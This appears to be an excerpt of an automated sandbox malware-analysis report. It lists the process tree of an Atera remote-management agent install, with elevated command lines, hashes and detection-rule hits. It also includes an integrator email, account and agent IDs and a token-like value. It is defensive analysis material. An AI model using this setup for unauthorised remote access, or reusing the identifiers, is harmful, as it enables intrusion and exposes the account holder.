Target ID:5
Start time:09:57:47
Start date:02/10/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase:0x7ff7b4ee0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:6
Start time:09:57:47
Start date:02/10/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSIA259.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5022328 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
Imagebase:0xbe0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000006.00000002.1359772261.0000000004CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000006.00000002.1359772261.0000000004D64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:7
Start time:09:57:52
Start date:02/10/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSIB4E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5027093 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
Imagebase:0xbe0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:8
Start time:09:57:54
Start date:02/10/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000
Imagebase:0x330000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:09:57:54
Start date:02/10/2024
Path:C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):true
Commandline:"NET" STOP AteraAgent
Imagebase:0x8a0000
File size:47'104 bytes
MD5 hash:31890A7DE89936F922D44D677F681A7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:09:57:54
Start date:02/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:09:57:54
Start date:02/10/2024
Path:C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\net1 STOP AteraAgent
Imagebase:0xd00000
File size:139'776 bytes
MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:09:57:55
Start date:02/10/2024
Path:C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):true
Commandline:"TaskKill.exe" /f /im AteraAgent.exe
Imagebase:0xf00000
File size:74'240 bytes
MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:09:57:55
Start date:02/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:09:57:56
Start date:02/10/2024
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48"
Imagebase:0x1e726670000
File size:145'968 bytes
MD5 hash:477293F80461713D51A98A24023D45E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
Antivirus matches:
• Detection: 26%, ReversingLabs
Has exited:true

Target ID:16
Start time:09:58:00
Start date:02/10/2024
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
Imagebase:0x23476510000
File size:145'968 bytes
MD5 hash:477293F80461713D51A98A24023D45E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477B9F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340006F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.00000234765D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1925477451.0000023477EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.00000234765D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.000002347668E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234007AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400398000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234006B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1919102536.0000023476820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916873070.00000234765C0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340063A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400440000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.0000023476656000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477B52000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1920033330.000002347761B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.000002347660D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1941036386.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:09:58:01
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                        Imagebase:0x7ff6be5f0000
                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:09:58:01
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:09:58:01
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSID8C1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5036234 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                                                                                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:11:19:43
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x1fd40e70000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD41971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1581326542.000001FD410F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1581326542.000001FD410B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1585649904.000001FD5A0F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD419E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD419B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:11:19:43
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:11:19:43
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x26ad1980000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1CDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582648644.0000026AD2433000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582267189.0000026AD1E90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1581307208.0000026AD1C4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1595672822.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582648644.0000026AD23B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1582648644.0000026AD2423000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:11:19:43
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:11:19:47
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x1a113ae0000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1608506296.000001A113DF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1609284413.000001A1145C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1608506296.000001A113D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1608506296.000001A113D9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1609162164.000001A113FB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1608506296.000001A113D69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1609284413.000001A1145B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1609284413.000001A114541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:11:19:47
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:11:19:47
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                        Imagebase:0x1a880f30000
                                                                                                                                                                                                                                        File size:145'968 bytes
                                                                                                                                                                                                                                        MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2152969045.000001A8819BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:11:19:48
                                                                                                                                                                                                                                        Start date:02/10/2024
